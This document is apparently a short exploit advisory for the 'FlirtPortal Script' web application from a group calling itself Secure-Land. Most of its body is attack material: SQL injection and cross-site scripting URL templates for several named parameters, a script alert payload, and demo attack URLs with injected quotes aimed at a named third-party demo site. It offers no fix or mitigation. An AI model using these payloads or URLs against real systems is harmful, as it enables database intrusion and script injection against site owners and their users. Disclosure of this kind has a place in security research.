FlirtPortal Script suffers from cross site scripting and remote SQL injection vulnerabilities.
c9d6b60ae6be968eb4af63c0f48ff6ecb8a4a072ed5d0fe9a2c3756139950c12
########################################################################################
# #
# Exploit Title : FlirtPortal Script Multiple Vulnerabilities #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Version : All Version #
# #
# Demo : www.scripte24shop.de/demo/flirtportal #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# #
########################################################################################
# #
# Expl0iT: #
# #
# ~[SQL] : #
# #
# http://[TarGeT]/rub.php?rub=[SQL] #
# http://[TarGeT]/rub2.php?rub=[SQL] #
# http://[TarGeT]/index_start.php?trefferid=[SQL] #
# #
# ~[XSS] : #
# #
# http://[TarGeT]/index_kartensuche.php?ctitle=[XSS] #
# #
# +XSS : <script>alert(/farbodmahini/)</script> #
# #
# #
# Demo : #
# #
# www.scripte24shop.de/demo/flirtportal/index_kartensuche.php?ctitle=[XSS] #
# http://www.scripte24shop.de/demo/flirtportal/index_start.php?trefferid=8' #
# http://www.scripte24shop.de/demo/flirtportal/rub2.php?rub=3' #
# http://www.scripte24shop.de/demo/flirtportal/rub.php?rub=4' #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################